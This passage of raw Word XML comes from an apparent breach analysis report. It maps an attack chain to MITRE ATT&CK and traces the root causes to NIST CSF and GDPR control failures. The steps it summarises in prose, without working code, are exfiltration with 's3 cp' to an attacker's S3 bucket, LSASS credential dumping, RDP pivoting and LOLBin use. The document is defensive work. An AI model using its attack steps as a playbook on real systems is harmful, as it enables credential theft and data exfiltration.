              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF36EE0" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1048.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F15958" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration Over Unencrypted/Obscured Non-C2 Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60FD7A3B" w14:textId="3FA49BC2" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">The target IP data, once collected, was moved using the new IAM key via the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>AWS CLI (</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">s3 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB200C">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>command)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to an external attacker-controlled S3 bucket. This used standard, legitimate AWS traffic, making detection significantly harder</w:t>
            </w:r>
            <w:hyperlink w:anchor="fourth" w:history="1">
              <w:sdt>
                <w:sdtPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                  <w:id w:val="-1256669496"/>
                  <w:citation/>
                </w:sdtPr>
                <w:sdtEndPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                </w:sdtEndPr>
                <w:sdtContent>
                  <w:r w:rsidR="006C076B" w:rsidRPr="00C00469">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r w:rsidR="006C076B" w:rsidRPr="00C00469">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> CITATION PTE25 \l 1033 </w:instrText>
                  </w:r>
                  <w:r w:rsidR="006C076B" w:rsidRPr="00C00469">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r w:rsidR="00C00469">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="00C00469" w:rsidRPr="00C00469">
                    <w:rPr>
                      <w:noProof/>
                      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                    </w:rPr>
                    <w:t>[4]</w:t>
                  </w:r>
                  <w:r w:rsidR="006C076B" w:rsidRPr="00C00469">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:sdtContent>
              </w:sdt>
              <w:r w:rsidRPr="00C00469">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BDF3461" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc215571130"/>
      <w:r>
        <w:t>Root Cause Analysis (RCA) and Control Failure in a Compliance Context</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3CE977EE" w14:textId="470B0B24" w:rsidR="0050788B" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The successful breach was not likely to </w:t>
      </w:r>
      <w:r w:rsidR="00AE4B0D">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a single oversight but a cascade of failures across technology, people, and process, basically undermining the principle of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE4B0D">
        <w:t>Defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in Depth. This analysis links the observed TTPs to systemic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE4B0D">
        <w:t>organisational</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> control failures, evaluated against standards like the NIST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cybersecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Framework (CSF) </w:t>
      </w:r>
      <w:hyperlink w:anchor="fifth" w:history="1">
        <w:r w:rsidRPr="00C00469">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[5</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00C00469">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>]</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t>and GDPR (due to the handling of PII data during the lateral movement phase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AAC7B1" w14:textId="77777777" w:rsidR="0050788B" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29BBB029" w14:textId="77777777" w:rsidR="0050788B" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Architectural and Technical Failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2061ED16" w14:textId="77777777" w:rsidR="0050788B" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D136D0" w14:textId="18393F22" w:rsidR="0050788B" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0050788B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Supply Chain Insecurity (T1195.002) – Failure Category: IDENTIFY &amp; PROTECT:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The first stage to access </w:t>
      </w:r>
      <w:r w:rsidR="00AE4B0D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vector was a compromised CI/CD pipeline. Looking for the root cause was the lack of stringent third-party risk management and the failure to enforce least-privilege principles on build servers. The server that was built with an internal host should never have been granted high-trust access to the internal network beyond its specific, required endpoints. This directly violates the NIST CSF's PR.IP-12 (Least Privilege Principle) </w:t>
      </w:r>
      <w:hyperlink w:anchor="fifth" w:history="1">
        <w:r w:rsidRPr="00C00469">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[5].</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6030B0E3" w14:textId="77777777" w:rsidR="0050788B" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FEE0D0" w14:textId="77777777" w:rsidR="0050788B" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0050788B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Weak Credential Management (T1003.001) – Failure Category:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PROTECT: The ability to dump LSASS memory and steal plaintext credentials demonstrates a critical failure to deploy compensating controls. The absence of mandatory Windows Defender Credential Guard or comparable Kernel-level protection allowed access to credential material. Therefore, the absence of a Tiered Administrative Model (TAM) meant that high-value service account credentials were </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loggable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on a standard user workstation, bypassing principles of Separation of Duties crucial for regulatory compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B035811" w14:textId="77777777" w:rsidR="0050788B" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A56491D" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00133237" w:rsidRDefault="0050788B" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0050788B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Insufficient Network Segmentation (T1021.001) – Failure Category</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: DETECT &amp; RESPOND: Once inside, the attacker entered just using RDP (a legitimate service). The failure here is architectural: the internal network was treated as inherently trusted. The lack of Zero Trust Architecture (ZTA) and micro-segmentation between the HR/Build VLANs and the Research VLAN allowed simple RDP traffic to facilitate the pivot. This violates the GDPR requirement for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pseudonymisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>minimisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by exposing protected data to segments that did not strictly require access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F9535" w14:textId="276AA272" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="0050788B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00054C68">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Cloud Identity Misconfiguration (T1526, T1098.004)</w:t>
      </w:r>
      <w:r w:rsidRPr="00054C68">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="003A37AA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Failure Category:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A37AA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve">DETECT &amp; PROTECT: The most critical failure was the ability to pivot to the AWS cloud by finding plaintext credentials and then creating a new access key. This indicates a profound absence of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E401E9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cloud Security Posture Management (CSPM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> solution to detect the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E401E9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>configuration drift</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> (plaintext key storage) and a lack of specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E401E9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CloudTrail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E401E9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> logging alerts </w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve">on sensitive IAM events like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB200C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CreateAccessKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB200C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>UpdateAccessKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> from suspicious source IPs</w:t>
      </w:r>
      <w:hyperlink w:anchor="fourth" w:history="1">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
            <w:id w:val="-747958200"/>
            <w:citation/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:r w:rsidR="00822C97" w:rsidRPr="001620E3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00822C97" w:rsidRPr="001620E3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> CITATION PTE25 \l 1033 </w:instrText>
            </w:r>
            <w:r w:rsidR="00822C97" w:rsidRPr="001620E3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001620E3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001620E3" w:rsidRPr="001620E3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
              </w:rPr>
              <w:t>[4]</w:t>
            </w:r>
            <w:r w:rsidR="00822C97" w:rsidRPr="001620E3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:sdtContent>
        </w:sdt>
      </w:hyperlink>
      <w:r w:rsidRPr="00133237">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB200C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BEA85" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1870C91C" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00054C68" w:rsidRDefault="00133237" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054C68">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Process and Procedural Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DFF404" w14:textId="77777777" w:rsidR="00054C68" w:rsidRPr="00133237" w:rsidRDefault="00054C68" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA103CF" w14:textId="7C406CDA" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00054C68">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability and Patch Management (T1068):</w:t>
      </w:r>
      <w:r w:rsidRPr="00054C68">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00EC4F81">
        <w:t>benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> of an outdated application on an internal server shows a systemic failure in the Patch Management Lifecycle. This process failure leads to </w:t>
      </w:r>
      <w:r w:rsidR="00D07609">
        <w:t>the exposure</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D07609">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> N-day vulnerabilities, despite readily available patches, fundamentally undermining the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B570CD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PROTECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> function of the NIST CSF</w:t>
      </w:r>
      <w:hyperlink w:anchor="fifth" w:history="1">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
            <w:id w:val="301820329"/>
            <w:citation/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:r w:rsidR="00822C97" w:rsidRPr="00C04F69">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00822C97" w:rsidRPr="00C04F69">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> CITATION Nat18 \l 1033 </w:instrText>
            </w:r>
            <w:r w:rsidR="00822C97" w:rsidRPr="00C04F69">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C04F69">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C04F69" w:rsidRPr="00C04F69">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
              </w:rPr>
              <w:t>[5]</w:t>
            </w:r>
            <w:r w:rsidR="00822C97" w:rsidRPr="00C04F69">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:sdtContent>
        </w:sdt>
      </w:hyperlink>
      <w:r w:rsidRPr="00133237">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C0B8B" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259CD207" w14:textId="36C6CAD5" w:rsidR="00141FDA" w:rsidRDefault="00133237" w:rsidP="005749AD">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00054C68">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Endpoint Logging and Monitoring (T1218.011, T1059.003):</w:t>
      </w:r>
      <w:r w:rsidRPr="00054C68">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t>The EDR solution</w:t>
      </w:r>
      <w:r w:rsidR="001F694F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve">failed </w:t>
      </w:r>
      <w:r w:rsidR="001F694F">
        <w:t xml:space="preserve">while used to </w:t>
      </w:r>
      <w:r w:rsidR="001F694F" w:rsidRPr="00133237">
        <w:t>detect</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> the use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00133237">
        <w:t>LOLBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B570CD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve">, PowerShell) to stage payloads. This is not a technical tool failure, but a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B570CD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>procedural failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> in configuring the EDR/SIEM to look for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07609">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>behavioural</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B570CD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> anomalies</w:t>
      </w:r>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> (e.g., a Microsoft binary executing from a temporary folder or spawning an unexpected network connection) rather than simply matching known file hashes. The security operations </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07609">
        <w:t>centre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> (SOC) lacked specific </w:t>
      </w:r>
      <w:r w:rsidRPr="00B570CD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Threat hunting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B570CD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>runbooks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> tailored to APT-style </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00133237">
        <w:t>LOLBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00133237">
        <w:t xml:space="preserve"> techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32254C" w14:textId="77777777" w:rsidR="00141FDA" w:rsidRDefault="00141FDA" w:rsidP="005749AD">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACD8469" w14:textId="77777777" w:rsidR="005749AD" w:rsidRPr="00133237" w:rsidRDefault="005749AD" w:rsidP="005749AD">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395DAC00" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0278B22A" w14:textId="77777777" w:rsidR="00A55F7D" w:rsidRDefault="00A55F7D" w:rsidP="00B34A71">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B57A330" w14:textId="77777777" w:rsidR="00A55F7D" w:rsidRDefault="00A55F7D" w:rsidP="00B34A71">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599C5F94" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00141FDA">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34A71">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34A71">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Strategic Recommendations for Resilience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B99F7" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1E7378" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRDefault="00EC4F81" w:rsidP="00B34A71">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC4F81">
        <w:t xml:space="preserve">Based on the RCA, the following crucial proposals are proposed to shift </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC4F81">
